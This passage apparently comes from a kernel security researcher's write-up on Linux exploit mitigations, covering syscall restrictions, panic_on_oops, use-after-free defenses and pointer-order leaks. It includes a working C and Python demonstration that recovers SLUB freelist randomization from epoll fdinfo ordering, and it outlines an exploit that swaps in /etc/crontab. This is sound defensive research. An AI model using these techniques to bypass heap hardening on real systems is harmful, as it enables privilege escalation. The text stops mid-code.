An alternative approach to checking memory safety rules at compile time is to do it either after the entire codebase has been compiled, or with an external tool that analyzes the entire codebase. This allows the analysis tooling to perform analysis across compilation units, reducing the amount of information that needs to be made explicit in headers. This may be a more viable approach if peppering annotations everywhere across headers isn't viable; but it also reduces the utility to human readers of the code, unless the inferred semantics are made visible to them through some special code viewer. It might also be less ergonomic in the long run if changes to one part of the kernel could make the verification of other parts fail - especially if those failures only show up in some configurations.

I think global static analysis is probably a good tool for finding some subsets of bugs, and it might also help with finding the worst-case depth of kernel stacks or proving the absence of deadlocks, but it's probably less suited for proving memory safety correctness?

Against exploit primitives: Attack primitive reduction via syscall restrictions

(Yes, I made up that name because I thought that capturing this under "Attack surface reduction" is too muddy.)

Because allocator fastpaths (both in SLUB and in the page allocator) are implemented using per-CPU data structures, the ease and reliability of exploits that want to coax the kernel's memory allocators into reallocating memory in specific ways can be improved if the attacker has fine-grained control over the assignment of exploit threads to CPU cores. I'm calling such a capability, which provides a way to facilitate exploitation by influencing relevant system state/behavior, an "attack primitive" here. Luckily for us, Linux allows tasks to pin themselves to specific CPU cores without requiring any privilege using the sched_setaffinity() syscall.
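To illustrate how little is needed for this primitive, here is a minimal sketch using Python's os.sched_setaffinity() wrapper around the same syscall. It assumes a Linux system; the helper name pin_to_cpu is made up for this example, and the sketch picks a core from the current affinity mask so that it does not depend on a particular CPU count.

```python
import os

def pin_to_cpu(cpu):
    """Restrict the caller to a single CPU core (Linux only)."""
    os.sched_setaffinity(0, {cpu})      # pid 0 refers to the caller
    return os.sched_getaffinity(0)

# Pick a core we are already allowed to run on; no privilege is required.
original = os.sched_getaffinity(0)
target = min(original)
pinned = pin_to_cpu(target)
print(f"pinned to CPU {target}: affinity is now {sorted(pinned)}")

# Restore the original mask so the rest of the program is unaffected.
os.sched_setaffinity(0, original)
```

An exploit would typically do this once per thread, so that allocations and frees that are supposed to interact all go through the same per-CPU allocator state.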

(As a different example, one primitive that can provide an attacker with fairly powerful capabilities is being able to indefinitely stall kernel faults on userspace addresses via FUSE or userfaultfd.)

Just like in the section "Attack surface reduction" above, an attacker's ability to use these primitives can be reduced by filtering syscalls; but while the mechanism and the compatibility concerns are similar, the rest is fairly different:

Attack primitive reduction does not normally reliably prevent a bug from being exploited; and an attacker will sometimes even be able to obtain a similar but shoddier (more complicated, less reliable, less generic, ...) primitive indirectly, for example:

Attack surface reduction is about limiting access to code that is suspected to contain exploitable bugs; in a codebase written in a memory-unsafe language, that tends to apply to pretty much the entire codebase. Attack surface reduction is often fairly opportunistic: You permit the things you need, and deny the rest by default.

Attack primitive reduction limits access to code that is suspected or known to provide (sometimes very specific) exploitation primitives. For example, one might decide to specifically forbid access to FUSE and userfaultfd for most code because of their utility for kernel exploitation, and, if one of those interfaces is truly needed, design a workaround that avoids exposing the attack primitive to userspace. This is different from attack surface reduction, where it often makes sense to permit access to any feature that a legitimate workload wants to use.

A nice example of an attack primitive reduction is the sysctl vm.unprivileged_userfaultfd, which was first introduced so that userfaultfd can be made completely inaccessible to normal users and was then later adjusted so that users can be granted access to part of its functionality without gaining the dangerous attack primitive. (But if you can create unprivileged user namespaces, you can still use FUSE to get an equivalent effect.)

When maintaining lists of allowed syscalls for a sandboxed system component, or something along those lines, it may be a good idea to explicitly track which syscalls are forbidden for attack primitive reduction reasons, or similarly strong reasons - otherwise one might accidentally end up permitting them in the future. (I guess that's kind of similar to issues that one can run into when maintaining ACLs...)
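One way such tracking could look is sketched below. Everything in it is hypothetical: the policy contents, the recorded reasons, and the permit() helper are illustrative and not taken from any real sandbox.

```python
# Hypothetical policy for one sandboxed component; all entries are illustrative.
ALLOWED = frozenset({"read", "write", "epoll_wait", "futex"})

# Syscalls denied for attack primitive reduction, with the reason recorded
# next to the entry so that it survives later policy edits.
FORBIDDEN_PRIMITIVES = {
    "userfaultfd": "can stall kernel faults on userspace addresses",
    "sched_setaffinity": "gives fine-grained control over CPU placement",
}

def permit(allowed, syscall):
    """Return a new allowlist that includes syscall, unless it is explicitly forbidden."""
    if syscall in FORBIDDEN_PRIMITIVES:
        raise ValueError(f"{syscall} is forbidden: {FORBIDDEN_PRIMITIVES[syscall]}")
    return allowed | {syscall}

print(sorted(permit(ALLOWED, "getpid")))
try:
    permit(ALLOWED, "userfaultfd")
except ValueError as exc:
    print(exc)
```

The point of the separate table is that a default-deny list alone cannot distinguish "nobody needed this yet" from "this was deliberately kept out".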

But like in the previous section, attack primitive reduction also tends to rely on making some functionality unavailable, and so it might not be viable in all situations. For example, newer versions of Android deliberately indirectly give apps access to FUSE through the AppFuse mechanism. (That API doesn't actually give an app direct access to /dev/fuse, but it does forward read/write requests to the app.)

Against oops-based oracles: Lockout or panic on crash

The ability to recover from kernel oopses in an exploit can help an attacker compensate for a lack of information about system state. Under some circumstances, it can even serve as a binary oracle that can be used to more or less perform a binary search for a value, or something like that.
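As a rough sketch of the binary-oracle idea, the following models an attacker who can only observe "this attempt oopsed" or "this attempt did not oops". The oracle itself is a stand-in: make_oracle() and the assumption that every guess above the secret value crashes are invented for the illustration, not a description of a real bug.

```python
def make_oracle(secret):
    """Hypothetical stand-in for 'did this attempt make the kernel oops?'."""
    def oopses(guess):
        return guess > secret      # assumed: probing past the secret crashes
    return oopses

def recover(oopses, lo, hi):
    """Find the largest value in [lo, hi] that does not oops."""
    queries = 0
    while lo < hi:
        mid = (lo + hi + 1) // 2
        queries += 1
        if oopses(mid):
            hi = mid - 1           # crash: the secret is below mid
        else:
            lo = mid               # survived: the secret is at least mid
    return lo, queries

value, queries = recover(make_oracle(0x2A7), 0, 0xFFF)
print(hex(value), queries)
```

With 4096 candidate values, the search needs 12 attempts, about half of which end in an oops; a system that panics or locks the attacker out on the first oops removes the oracle entirely.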

(It used to be even worse on some distributions, where dmesg was accessible for unprivileged users; so if you managed to trigger an oops or WARN, you could then grab the register states at all IRET frames in the kernel stack, which could be used to leak things like kernel pointers. Luckily nowadays most distributions, including Ubuntu 20.10, restrict dmesg access.)

Android and Chrome OS nowadays set the kernel's panic_on_oops flag, meaning the machine will immediately restart when a kernel oops happens. This makes it hard to use oopsing as part of an exploit, and arguably also makes more sense from a reliability standpoint - the system will be down for a bit, and it will lose its existing state, but it will also reset into a known-good state instead of continuing in a potentially half-broken state, especially if the crashing thread was holding mutexes that can never again be released, or things like that. On the other hand, if some service crashes on a desktop system, perhaps that shouldn't cause the whole system to immediately go down and make you lose unsaved state - so panic_on_oops might be too drastic there.

A good solution to this might require a more fine-grained approach. (For example, grsecurity has for a long time had the ability to lock out specific UIDs that have caused crashes.) Perhaps it would make sense to allow the init daemon to use different policies for crashes in different services/sessions/UIDs?

Against UAF access: Deterministic UAF mitigation

One defense that would reliably stop an exploit for this issue would be a deterministic use-after-free mitigation. Such a mitigation would reliably protect the memory formerly occupied by the object from accesses through dangling pointers to the object, at least once the memory has been reused for a different purpose (including reuse to store heap metadata). For write operations, this probably requires either atomicity of the access check and the actual write or an RCU-like delayed freeing mechanism. For simple read operations, it can also be implemented by ordering the access check after the read, but before the read value is used.

A big downside of this approach on its own is that extra checks on every memory access will probably come with an extremely high efficiency penalty, especially if the mitigation can not make any assumptions about what kinds of parallel accesses might be happening to an object, or what semantics pointers have. (The proof-of-concept implementation I presented at LSSNA 2020 (slides, recording) had CPU overhead roughly in the range 60%-159% in kernel-heavy benchmarks, and ~8% for a very userspace-heavy benchmark.)

Unfortunately, even a deterministic use-after-free mitigation often won't be enough to deterministically limit the blast radius of something like a refcounting mistake to the object in which it occurred. Consider a case where two codepaths concurrently operate on the same object: Codepath A assumes that the object is live and subject to normal locking rules. Codepath B knows that the reference count reached zero, assumes that it therefore has exclusive access to the object (meaning all members are mutable without any locking requirements), and is trying to tear down the object. Codepath B might then start dropping references the object was holding on other objects while codepath A is following the same references. This could then lead to use-after-frees on pointed-to objects. If all data structures are subject to the same mitigation, this might not be too much of a problem; but if some data structures (like struct page) are not protected, it might permit a mitigation bypass.

Similar issues apply to data structures with union members that are used in different object states; for example, here's some random kernel data structure with an rcu_head in a union (just a random example, there isn't anything wrong with this code as far as I know):

struct allowedips_node {
    struct wg_peer __rcu *peer;
    struct allowedips_node __rcu *bit[2];
    /* While it may seem scandalous that we waste space for v4,
     * we're alloc'ing to the nearest power of 2 anyway, so this
     * doesn't actually make a difference.
     */
    u8 bits[16] __aligned(__alignof(u64));
    u8 cidr, bit_at_a, bit_at_b, bitlen;

    /* Keep rarely used list at bottom to be beyond cache line. */
    union {
        struct list_head peer_list;
        struct rcu_head rcu;
    };
};

As long as everything is working properly, the peer_list member is only used while the object is live, and the rcu member is only used after the object has been scheduled for delayed freeing; so this code is completely fine. But if a bug somehow caused the peer_list to be read after the rcu member has been initialized, type confusion would result.
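The overlap can be modeled in userspace with Python's ctypes. This is only a sketch: pointers are represented as plain 64-bit integers, the class names are made up, and the address values are arbitrary.

```python
import ctypes

class ListHead(ctypes.Structure):      # models struct list_head
    _fields_ = [("next", ctypes.c_uint64), ("prev", ctypes.c_uint64)]

class RcuHead(ctypes.Structure):       # models struct rcu_head
    _fields_ = [("next", ctypes.c_uint64), ("func", ctypes.c_uint64)]

class Tail(ctypes.Union):              # models the anonymous union at the end
    _fields_ = [("peer_list", ListHead), ("rcu", RcuHead)]

tail = Tail()

# Live object: the list linkage is valid.
tail.peer_list.next = 0x1000
tail.peer_list.prev = 0x2000

# Object scheduled for delayed freeing: the rcu member is initialized,
# which overwrites the same 16 bytes.
tail.rcu.next = 0
tail.rcu.func = 0xFFFF0000             # arbitrary stand-in for a callback address

# A buggy late reader of peer_list now sees the callback pointer as 'prev'.
print(hex(tail.peer_list.prev))        # 0xffff0000
```

Note that no memory is freed or reused in this model, so a mitigation that only polices freed memory would have nothing to catch here.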

In my opinion, this demonstrates that while UAF mitigations do have a lot of value (and would have reliably prevented exploitation of this specific bug), a use-after-free is just one possible consequence of the symptom class "object state confusion" (which may or may not be the same as the bug class of the root cause). It would be even better to enforce rules on object states, and ensure that an object e.g. can't be accessed through a "refcounted" reference anymore after the refcount has reached zero and has logically transitioned into a state like "non-RCU members are exclusively owned by thread performing teardown" or "RCU callback pending, non-RCU members are uninitialized" or "exclusive access to RCU-protected members granted to thread performing teardown, other members are uninitialized". Of course, doing this as a runtime mitigation would be even costlier and messier than a reliable UAF mitigation; this level of protection is probably only realistic with at least some level of annotations and static validation.

Against UAF access: Probabilistic UAF mitigation; pointer leaks

Summary: Some types of probabilistic UAF mitigation break if the attacker can leak information about pointer values; and information about pointer values easily leaks to userspace, e.g. through pointer comparisons in map/set-like structures.

If a deterministic UAF mitigation is too costly, an alternative is to do it probabilistically; for example, by tagging pointers with a small number of bits that are checked against object metadata on access, and then changing that object metadata when objects are freed.
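A toy model of such a scheme is sketched below. The 4-bit tag width, the TaggedHeap class, and the choice to pick a fresh random tag on both free and allocation are assumptions made for this illustration; real designs differ in how tags are chosen and checked.

```python
import random

TAG_BITS = 4                           # assumed tag width

class TaggedHeap:
    def __init__(self, seed):
        self.rng = random.Random(seed)
        self.tags = {}                 # address -> tag stored in object metadata

    def alloc(self, addr):
        tag = self.rng.randrange(1 << TAG_BITS)
        self.tags[addr] = tag
        return (tag, addr)             # a "pointer": tag bits plus address

    def free(self, ptr):
        # Change the metadata so that old pointers (probably) stop matching.
        self.tags[ptr[1]] = self.rng.randrange(1 << TAG_BITS)

    def access_ok(self, ptr):
        tag, addr = ptr
        return self.tags[addr] == tag

def count_undetected(trials, seed=0):
    heap = TaggedHeap(seed)
    undetected = 0
    for _ in range(trials):
        dangling = heap.alloc(0x1000)
        heap.free(dangling)
        fresh = heap.alloc(0x1000)     # memory is reused at the same address
        assert heap.access_ok(fresh)
        if heap.access_ok(dangling):   # stale tag happens to match the new one
            undetected += 1
    return undetected

undetected = count_undetected(16000)
print(f"{undetected} of 16000 dangling accesses went undetected")
```

In this model roughly one in sixteen dangling accesses slips through, which is why an attacker who can learn whether the tag matched before touching the object gets to retry until it does.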

The downside of this approach is that information leaks can be used to break the protection. One type of information leak that I'd like to highlight (without any judgment on the relative importance of this compared to other types of information leaks) is intentional pointer comparisons, which have quite a few facets.

A relatively straightforward example where this could be an issue is the kcmp() syscall. This syscall compares two kernel objects using an arithmetic comparison of their permuted pointers (using a per-boot randomized permutation, see kptr_obfuscate()) and returns the result of the comparison (smaller, equal or greater). This gives userspace a way to order handles to kernel objects (e.g. file descriptors) based on the identities of those kernel objects (e.g. struct file instances), which in turn allows userspace to group a set of such handles by backing kernel object in O(n*log(n)) time using a standard sorting algorithm.
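The grouping step can be sketched with a simulated comparison function. Here kcmp_model() stands in for the syscall and returns a negative, zero, or positive value like a C comparator; the file descriptor table, the addresses, and the xor-and-multiply permutation are all invented for the example and are only meant to behave like a per-boot randomized permutation.

```python
import functools
import random

MASK = (1 << 64) - 1
_rng = random.Random(1234)
COOKIE_XOR = _rng.getrandbits(64)
COOKIE_MUL = _rng.getrandbits(64) | 1  # odd, so multiplying mod 2**64 is a permutation

def obfuscate(ptr):
    return ((ptr ^ COOKIE_XOR) * COOKIE_MUL) & MASK

# fd -> address of the backing object; hidden from the "userspace" code below.
FD_TABLE = {
    3: 0xFFFF888000001000,
    4: 0xFFFF888000002000,
    5: 0xFFFF888000001000,
    6: 0xFFFF888000003000,
    7: 0xFFFF888000002000,
}

def kcmp_model(fd1, fd2):
    """Order two handles by the permuted address of their backing objects."""
    a, b = obfuscate(FD_TABLE[fd1]), obfuscate(FD_TABLE[fd2])
    return (a > b) - (a < b)

def group_by_object(fds):
    """Group handles by backing object using O(n*log(n)) comparisons."""
    ordered = sorted(fds, key=functools.cmp_to_key(kcmp_model))
    groups = []
    for fd in ordered:
        if groups and kcmp_model(groups[-1][0], fd) == 0:
            groups[-1].append(fd)      # same object as the previous handle
        else:
            groups.append([fd])
    return groups

print(group_by_object(FD_TABLE))
```

The grouping code never sees an address; it only needs a consistent ordering, which is exactly what the comparison result provides.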

This syscall can be abused for improving the reliability of use-after-free exploits against some struct types because it checks whether two pointers to kernel objects are equal without accessing those objects: An attacker can allocate an object, somehow create a reference to the object that is not counted properly, free the object, reallocate it, and then verify whether the reallocation indeed reused the same address by comparing the dangling reference and a reference to the new object with kcmp(). If kcmp() includes the pointer's tag bits in the comparison, this would likely also permit breaking probabilistic UAF mitigations.

Essentially the same concern applies when a kernel pointer is encrypted and then given to userspace in fuse_lock_owner_id(), which encrypts the pointer to a files_struct with an open-coded version of XTEA before passing it to a FUSE daemon.

In both these cases, explicitly stripping tag bits would be an acceptable workaround because a pointer without tag bits still uniquely identifies a memory location; and given that these are very special interfaces that intentionally expose some degree of information about kernel pointers to userspace, it would be reasonable to adjust this code manually.

A somewhat more interesting example is the behavior of this piece of userspace code:

#define _GNU_SOURCE
#include <sys/epoll.h>
#include <sys/eventfd.h>
#include <sys/resource.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sched.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

int main(void) {
  struct rlimit rlim;
  SYSCHK(getrlimit(RLIMIT_NOFILE, &rlim));
  rlim.rlim_cur = rlim.rlim_max;
  SYSCHK(setrlimit(RLIMIT_NOFILE, &rlim));

  cpu_set_t cpuset;
  CPU_ZERO(&cpuset);
  CPU_SET(0, &cpuset);
  SYSCHK(sched_setaffinity(0, sizeof(cpuset), &cpuset));

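  int epfd = SYSCHK(epoll_create1(0));
  /* Filler: 1000 eventfds that are never registered with epoll. */
  for (int i=0; i<1000; i++)
    SYSCHK(eventfd(0, 0));
  /* 192 more eventfds, each watched with its creation index as data. */
  for (int i=0; i<192; i++) {
    int fd = SYSCHK(eventfd(0, 0));
    struct epoll_event event = {
      .events = EPOLLIN,
      .data = { .u64 = i }
    };
    SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event));
  }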

  char cmd[100];
  sprintf(cmd, "cat /proc/%d/fdinfo/%d", getpid(), epfd);
  system(cmd);
}

It first creates a ton of eventfds that aren't used. Then it creates a bunch more eventfds and creates epoll watches for them, in creation order, with a monotonically incrementing counter in the "data" field. Afterwards, it asks the kernel to print the current state of the epoll instance, which comes with a list of all registered epoll watches, including the value of the data member (in hex). But how is this list sorted? Here's the result of running that code in an Ubuntu 20.10 VM (truncated, because it's a bit long):

user@ubuntuvm:~/epoll_fdinfo$ ./epoll_fdinfo 
pos:    0
flags:  02
mnt_id: 14
tfd:     1040 events:       19 data:               24  pos:0 ino:2f9a sdev:d
tfd:     1050 events:       19 data:               2e  pos:0 ino:2f9a sdev:d
tfd:     1024 events:       19 data:               14  pos:0 ino:2f9a sdev:d
tfd:     1029 events:       19 data:               19  pos:0 ino:2f9a sdev:d
tfd:     1048 events:       19 data:               2c  pos:0 ino:2f9a sdev:d
tfd:     1042 events:       19 data:               26  pos:0 ino:2f9a sdev:d
tfd:     1026 events:       19 data:               16  pos:0 ino:2f9a sdev:d
tfd:     1033 events:       19 data:               1d  pos:0 ino:2f9a sdev:d
[...]

The data: field here is the loop index we stored in the .data member, formatted as hex. Here is the complete list of the data values in decimal:

36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19, 95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110, 12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10, 135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118, 66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81, 177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160, 186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184

While these look sort of random, you can see that the list can be split into blocks of at most 32 values, each of which is a shuffled contiguous sequence of numbers:

Block 1 (32 values in range 19-50):
36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19

Block 2 (32 values in range 83-114):
95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110

Block 3 (19 values in range 0-18):
12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10

Block 4 (32 values in range 115-146):
135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118

Block 5 (32 values in range 51-82):
66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81

Block 6 (32 values in range 147-178):
177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160

Block 7 (13 values in range 179-191):
186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184

What's going on here becomes clear when you look at the data structures epoll uses internally. ep_insert calls ep_rbtree_insert to insert a struct epitem into a red-black tree (a type of sorted binary tree); and this red-black tree is sorted using a tuple of a struct file * and a file descriptor number:

/* Compare RB tree keys */
static inline int ep_cmp_ffd(struct epoll_filefd *p1,
                             struct epoll_filefd *p2)
{
        return (p1->file > p2->file ? +1:
                (p1->file < p2->file ? -1 : p1->fd - p2->fd));
}

So the values we're seeing have been ordered based on the virtual address of the corresponding struct file; and SLUB allocates struct file from order-1 pages (i.e. pages of size 8 KiB), which can hold 32 objects each:

root@ubuntuvm:/sys/kernel/slab/filp# cat order 
1
root@ubuntuvm:/sys/kernel/slab/filp# cat objs_per_slab 
32
root@ubuntuvm:/sys/kernel/slab/filp# 

This explains the grouping of the numbers we saw: Each block of 32 contiguous values corresponds to an order-1 page that was previously empty and is used by SLUB to allocate objects until it becomes full.

With that knowledge, we can transform those numbers a bit, to show the order in which objects were allocated inside each page (excluding pages for which we haven't seen all allocations):

$ cat slub_demo.py 
#!/usr/bin/env python3
blocks = [
  [ 36, 46, 20, 25, 44, 38, 22, 29, 30, 45, 33, 28, 41, 31, 23, 37, 24, 50, 32, 26, 21, 43, 35, 48, 27, 39, 40, 47, 42, 34, 49, 19 ],
  [ 95, 105, 111, 84, 103, 97, 113, 88, 89, 104, 92, 87, 100, 90, 114, 96, 83, 109, 91, 85, 112, 102, 94, 107, 86, 98, 99, 106, 101, 93, 108, 110 ],
  [ 12, 1, 14, 5, 6, 9, 4, 17, 7, 13, 0, 8, 2, 11, 3, 15, 16, 18, 10 ],
  [ 135, 145, 119, 124, 143, 137, 121, 128, 129, 144, 132, 127, 140, 130, 122, 136, 123, 117, 131, 125, 120, 142, 134, 115, 126, 138, 139, 146, 141, 133, 116, 118 ],
  [ 66, 76, 82, 55, 74, 68, 52, 59, 60, 75, 63, 58, 71, 61, 53, 67, 54, 80, 62, 56, 51, 73, 65, 78, 57, 69, 70, 77, 72, 64, 79, 81 ],
  [ 177, 155, 161, 166, 153, 147, 163, 170, 171, 154, 174, 169, 150, 172, 164, 178, 165, 159, 173, 167, 162, 152, 176, 157, 168, 148, 149, 156, 151, 175, 158, 160 ],
  [ 186, 188, 179, 180, 183, 191, 181, 187, 182, 185, 189, 190, 184 ]
]

for alloc_indices in blocks:
  if len(alloc_indices) != 32:
    continue
  # indices of allocations ('data'), sorted by memory location, shifted to be relative to the block
  alloc_indices_relative = [position - min(alloc_indices) for position in alloc_indices]
  # reverse mapping: memory locations of allocations,
  # sorted by index of allocation ('data').
  # if we've observed all allocations in a page,
  # these will really be indices into the page.
  memory_location_by_index = [alloc_indices_relative.index(idx) for idx in range(0, len(alloc_indices))]
  print(memory_location_by_index)
$ ./slub_demo.py 
[31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17]
[16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2, 20, 6, 14]
[23, 30, 17, 31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27]
[20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15, 5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2]
[5, 25, 26, 12, 28, 21, 4, 9, 1, 27, 23, 30, 17, 31, 2, 20, 6, 14, 16, 3, 19, 24, 11, 7, 8, 13, 18, 10, 29, 22, 0, 15]

And these sequences are almost the same, except that they have been rotated around by different amounts. This is exactly the SLUB freelist randomization scheme, as introduced in commit 210e7a43fa905!

When a SLUB kmem_cache is created (an instance of the SLUB allocator for a specific size class and potentially other specific attributes, usually initialized at boot time), init_cache_random_seq and cache_random_seq_create fill an array ->random_seq with randomly-ordered object indices via Fisher-Yates shuffle, with the array length equal to the number of objects that fit into a page. Then, whenever SLUB grabs a new page from the lower-level page allocator, it initializes the page freelist using the indices from ->random_seq, starting at a random index in the array (and wrapping around when the end is reached). (I'm ignoring the low-order allocation fallback here.)
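The scheme and the leak can be reproduced in a small simulation. This is a simplified model rather than the kernel's code: it only hands out completely fresh slabs, it assumes an object size of 256 bytes (8 KiB divided by 32 objects), and all function names are made up. The recover() step applies the same transformation as slub_demo.py to an address-sorted listing.

```python
import random

OBJS_PER_SLAB = 32                     # objs_per_slab for filp, as shown above
OBJ_SIZE = 256                         # assumed: 8 KiB slab / 32 objects
SLAB_BYTES = OBJS_PER_SLAB * OBJ_SIZE

def allocate(rng, random_seq, num_slabs):
    """Hand out every object of num_slabs fresh slabs.
    Returns the object addresses in allocation order."""
    bases = [0x10000000 + i * SLAB_BYTES for i in range(num_slabs)]
    rng.shuffle(bases)                 # slabs arrive in no particular address order
    addrs = []
    for base in bases:
        start = rng.randrange(OBJS_PER_SLAB)                 # random starting index
        for k in range(OBJS_PER_SLAB):
            slot = random_seq[(start + k) % OBJS_PER_SLAB]   # wraps around
            addrs.append(base + slot * OBJ_SIZE)
    return addrs

def leak_order(addrs):
    """What an address-sorted listing reveals: allocation indices, sorted by address."""
    return sorted(range(len(addrs)), key=lambda i: addrs[i])

def recover(observed):
    """Per block of 32: the slot index of each allocation, in allocation order."""
    sequences = []
    for i in range(0, len(observed), OBJS_PER_SLAB):
        block = observed[i:i + OBJS_PER_SLAB]
        relative = [v - min(block) for v in block]
        sequences.append([relative.index(idx) for idx in range(OBJS_PER_SLAB)])
    return sequences

def is_rotation(a, b):
    return any(a == b[k:] + b[:k] for k in range(len(b)))

rng = random.Random(2021)
random_seq = list(range(OBJS_PER_SLAB))
rng.shuffle(random_seq)                # stands in for the per-cache ->random_seq
sequences = recover(leak_order(allocate(rng, random_seq, 5)))
print(all(is_rotation(seq, random_seq) for seq in sequences))
```

Every recovered sequence is a rotation of the hidden per-cache sequence, even though the simulated attacker only ever sees the order of the entries and never an address.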

So in summary, we can bypass SLUB randomization for the slab from which struct file is allocated because someone used it as a lookup key in a specific type of data structure. This is already fairly undesirable if SLUB randomization is supposed to provide protection against some types of local attacks for all slabs.

The heap-randomization-weakening effect of such data structures is not necessarily limited to cases where elements of the data structure can be listed in-order by userspace: If there was a codepath that iterated through the tree in-order and freed all tree nodes, that could have a similar effect, because the objects would be placed on the allocator's freelist sorted by address, cancelling out the randomization. In addition, you might be able to leak information about iteration order through cache side channels or such.

If we introduce a probabilistic use-after-free mitigation that relies on attackers not being able to learn whether the uppermost bits of an object's address changed after it was reallocated, this data structure could also break that. This case is messier than things like kcmp() because here the address ordering leak stems from a standard data structure.

You may have noticed that some of the examples I'm using here would be more or less limited to cases where an attacker is reallocating memory with the same type as the old allocation, while a typical use-after-free attack ends up replacing an object with a differently-typed one to cause type confusion. As an example of a bug that can be exploited for privilege escalation without type confusion at the C structure level, see entry 808 in our bugtracker. My exploit for that bug first starts a writev() operation on a writable file, lets the kernel validate that the file is indeed writable, then replaces the struct file with a read-only file pointing to /etc/crontab, and lets writev() continue. This allows gaining root privileges through a use-after-free bug without having to mess around with kernel pointers, data structure layouts, ROP, or anything like that. Of course that approach doesn't work with every use-after-free though.

(By the way: For an example of pointer leaks through container data structures in a JavaScript engine, see this bug I reported to Firefox back in 2016, when I wasn't a Google employee, which leaks the low 32 bits of a pointer by timing operations on pessimal hash tables - basically turning the HashDoS attack into an infoleak. Of course, nowadays, a side-channel-based pointer leak in a JS engine would probably not be worth treating as a security bug anymore, since you can probably get the same result with Spectre...)

Against freeing SLUB pages: Preventing virtual address reuse beyond the slab

(Also discussed a little bit on the kernel-hardening list in this thread.)

A weaker but less CPU-intensive alternative to trying to provide complete use-after-free protection for individual objects would be to ensure that virtual addresses that have been used for slab memory are never reused outside the slab, but that physical pages can still be reused. This would be the same basic approach as used by PartitionAlloc and others. In kernel terms, that would essentially mean serving SLUB allocations from vmalloc space.

Some challenges I can think of with this approach are:

  • SLUB allocations are currently served from the linear mapping, which normally uses hugepages; if vmalloc mappings with 4K PTEs were used instead, TLB pressure might increase, which might lead to some performance degradation.
  • To be able to use SLUB allocations in contexts that operate directly on physical memory, it is sometimes necessary for SLUB pages to be physically contiguous. That's not really a problem, but it is different from default vmalloc behavior. (Sidenote: DMA buffers don't always have to be physically contiguous - if you have an IOMMU, you can use that to map discontiguous pages to a contiguous DMA address range, just like how normal page tables create virtually-contiguous memory. See this kernel-internal API for an example that makes use of this, and Fuchsia's documentation for a high-level overview of how all this works in general.)
  • Some parts of the kernel convert back and forth between virtual addresses, struct page pointers, and (for interaction with hardware) physical addresses. This is a relatively straightforward mapping for addresses in the linear mapping, but would become a bit more complicated for vmalloc addresses. In particular, page_to_virt() and phys_to_virt() would have to be adjusted.
    • This is probably also going to be an issue for things like Memory Tagging, since pointer tags will have to be reconstructed when converting back to a virtual address. Perhaps it would make sense to forbid these helpers outside low-level memory management, and change existing users to instead keep a normal pointer to the allocation around? Or maybe you could let pointers to struct page carry the tag bits for the corresponding virtual address in unused/ignored address bits?

The probability that this defense can prevent UAFs from leading to exploitable type confusion depends somewhat on the granularity of slabs; if specific struct types have their own slabs, it provides more protection than if objects are only grouped by size. So to improve the utility of virtually-backed slab memory, it would be necessary to replace the generic kmalloc slabs (which contain various objects, grouped only by size) with ones that are segregated by type and/or allocation site. (The grsecurity/PaX folks have vaguely alluded to doing something roughly along these lines using compiler instrumentation.)
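The effect of slab granularity can be seen in a toy allocator with one LIFO freelist per cache. The ToyAllocator class, the type names struct_a and struct_b, and the 128-byte size are hypothetical; the only thing that varies between the two instances is whether caches are keyed by size or by type.

```python
class ToyAllocator:
    """One LIFO freelist per cache; key_fn decides which cache an object uses."""
    def __init__(self, key_fn):
        self.key_fn = key_fn
        self.freelists = {}
        self.next_addr = 0x1000

    def alloc(self, type_name, size):
        freelist = self.freelists.setdefault(self.key_fn(type_name, size), [])
        if freelist:
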